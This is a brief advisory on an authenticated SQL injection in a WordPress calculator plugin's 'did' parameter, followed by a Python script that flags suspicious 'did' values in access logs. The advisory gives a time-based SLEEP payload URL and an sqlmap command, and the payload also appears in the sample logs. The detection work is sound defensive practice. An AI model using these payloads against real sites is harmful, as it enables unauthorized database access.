The plugin does not sanitize the user-supplied ‘did’ parameter before using it in a SQL statement, leading to an authenticated SQL injection vulnerability. The plugin author has closed the plugin.
http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)
or, using the sqlmap tool:
./sqlmap.py -r request.txt --dbms=mysql --current-user -b -p did --batch --flush-session
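
A defensive check for this issue, added here as an example and not part of the original advisory or the plugin's code: it scans web-server access logs for requests to the wpcalc admin page whose ‘did’ value is not a plain integer. It assumes combined-log-format lines and that ‘did’ is meant to be a numeric record ID; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=wpcalc&info=del&did=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/admin.php?page=wpcalc&info=del&did=1%20AND%20(SELECT%207156%20FROM%20(SELECT(SLEEP(5)))MIkl) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/admin.php?page=wpcalc&info=del&did=1%2520OR%25201 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=other&did=abc HTTP/1.1" 200 128 "-" "Mozilla/5.0"
"""

# Client address and request target; the target may contain raw spaces.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (.+?) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding so double-encoded values are still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_did_requests(log_text):
    """Return (client_ip, decoded_did) for wpcalc requests with a non-integer did."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client_ip, target = match.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if params.get("page", [""])[0] != "wpcalc":
            continue  # only the plugin's admin page is in scope
        for raw in params.get("did", []):
            decoded = fully_decode(raw)
            # Assumption: a legitimate did is a bare numeric record ID.
            if not re.fullmatch(r"\d+", decoded):
                hits.append((client_ip, decoded))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_did_requests(SAMPLE_LOG):
        print(f"{ip}: non-numeric did -> {value!r}")
```

Access logs record only the query string, so a ‘did’ value sent in a POST body would need to be checked at a WAF or in application logging instead.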